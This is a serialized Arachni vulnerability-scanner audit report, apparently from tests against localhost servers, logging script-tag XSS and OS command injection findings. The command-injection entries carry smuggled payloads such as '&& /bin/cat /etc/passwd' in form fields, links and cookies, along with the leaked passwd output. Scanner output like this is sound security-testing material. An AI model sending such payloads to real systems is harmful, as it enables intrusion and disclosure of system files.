--- !ruby/object:Arachni::AuditStore 
delta_time: "00:00:00"
finish_datetime: Fri Oct  5 21:24:43 2012
issues: 
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside a <script> element.
        This makes Cross-Site Scripting attacks much easier to mount since user input lands inside
        a trusted script.
  elem: form
  internal_modname: XSSScriptTag
  method: GET
  mod_name: XSS in HTML "script" tag
  name: Cross-Site Scripting in HTML "script" tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:12630/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside a <script> element.
          This makes Cross-Site Scripting attacks much easier to mount since user input lands inside
          a trusted script.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "116"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: defaultarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSScriptTag
    method: GET
    mod_name: XSS in HTML "script" tag
    name: Cross-Site Scripting in HTML "script" tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :altered: input
      :element: form
      :params: 
        input: defaultarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: defaultarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: defaultarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:12630/form/append
      :match: <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: "        <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>\n"
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:12630/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside a <script> element.
        This makes Cross-Site Scripting attacks much easier to mount since user input lands inside
        a trusted script.
  elem: link
  internal_modname: XSSScriptTag
  method: GET
  mod_name: XSS in HTML "script" tag
  name: Cross-Site Scripting in HTML "script" tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:12630/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside a <script> element.
          This makes Cross-Site Scripting attacks much easier to mount since user input lands inside
          a trusted script.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "116"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: defaultarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSScriptTag
    method: GET
    mod_name: XSS in HTML "script" tag
    name: Cross-Site Scripting in HTML "script" tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :altered: input
      :element: link
      :params: 
        input: defaultarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: defaultarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        input: defaultarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:12630/link/append?input=default
      :match: <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: "        <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>\n"
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:12630/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside a <script> element.
        This makes Cross-Site Scripting attacks much easier to mount since user input lands inside
        a trusted script.
  elem: cookie
  internal_modname: XSSScriptTag
  method: GET
  mod_name: XSS in HTML "script" tag
  name: Cross-Site Scripting in HTML "script" tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:12630/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside a <script> element.
          This makes Cross-Site Scripting attacks much easier to mount since user input lands inside
          a trusted script.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+valuearachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "116"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: cookie valuearachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSScriptTag
    method: GET
    mod_name: XSS in HTML "script" tag
    name: Cross-Site Scripting in HTML "script" tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie valuearachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: cookie valuearachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        cookie2: cookie valuearachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:12630/cookie/append
      :match: <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: "        <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>\n"
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:12630/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside a <script> element.
        This makes Cross-Site Scripting attacks much easier to mount since user input lands inside
        a trusted script.
  elem: header
  internal_modname: XSSScriptTag
  method: GET
  mod_name: XSS in HTML "script" tag
  name: Cross-Site Scripting in HTML "script" tag.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - script
  - tag
  - regexp
  - dom
  - attribute
  - injection
  url: http://localhost:12630/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside a <script> element.
          This makes Cross-Site Scripting attacks much easier to mount since user input lands inside
          a trusted script.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_userarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "116"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: arachni_userarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
    internal_modname: XSSScriptTag
    method: GET
    mod_name: XSS in HTML "script" tag
    name: Cross-Site Scripting in HTML "script" tag.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_userarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: arachni_userarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :combo: 
        User-Agent: arachni_userarachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:12630/header/append
      :match: <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: "        <script>arachni_xss_in_script_tag_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1</script>\n"
    severity: High
    tags: 
    - xss
    - script
    - tag
    - regexp
    - dom
    - attribute
    - injection
    url: http://localhost:12630/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: form
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/unix/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: default /bin/cat /etc/passwd
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " /bin/cat /etc/passwd"
      :altered: input
      :element: form
      :params: 
        input: default /bin/cat /etc/passwd
      :follow_location: true
      :injected: default /bin/cat /etc/passwd
      :combo: 
        input: default /bin/cat /etc/passwd
      :action: http://localhost:6412/unix/form/append
      :verification: false
      :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/unix/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: form
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: POST
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/unix/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: "&& /bin/cat /etc/passwd"
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: POST
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: "&& /bin/cat /etc/passwd"
      :altered: input
      :element: form
      :params: 
        input: "&& /bin/cat /etc/passwd"
      :follow_location: true
      :injected: "&& /bin/cat /etc/passwd"
      :combo: 
        input: "&& /bin/cat /etc/passwd"
      :action: http://localhost:6412/unix/form/straight
      :verification: false
      :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/unix/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: link
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/unix/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: " /bin/cat /etc/passwd"
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " /bin/cat /etc/passwd"
      :altered: input
      :element: link
      :params: 
        input: " /bin/cat /etc/passwd"
      :follow_location: true
      :injected: " /bin/cat /etc/passwd"
      :combo: 
        input: " /bin/cat /etc/passwd"
      :action: http://localhost:6412/unix/link/straight?input=default
      :verification: false
      :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/unix/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: link
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/unix/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: default /bin/cat /etc/passwd
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " /bin/cat /etc/passwd"
      :altered: input
      :element: link
      :params: 
        input: default /bin/cat /etc/passwd
      :follow_location: true
      :injected: default /bin/cat /etc/passwd
      :combo: 
        input: default /bin/cat /etc/passwd
      :action: http://localhost:6412/unix/link/append?input=default
      :verification: false
      :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/unix/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: cookie
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/unix/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=+/bin/cat+/etc/passwd;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: " /bin/cat /etc/passwd"
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
      :match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " /bin/cat /etc/passwd"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: " /bin/cat /etc/passwd"
      :injected: " /bin/cat /etc/passwd"
      :combo: 
        cookie: " /bin/cat /etc/passwd"
      :action: http://localhost:6412/unix/cookie/straight
      :verification: false
      :id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
    regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/unix/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: cookie
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/unix/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value+/bin/cat+/etc/passwd
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "76"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
    injected: cookie value /bin/cat /etc/passwd
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
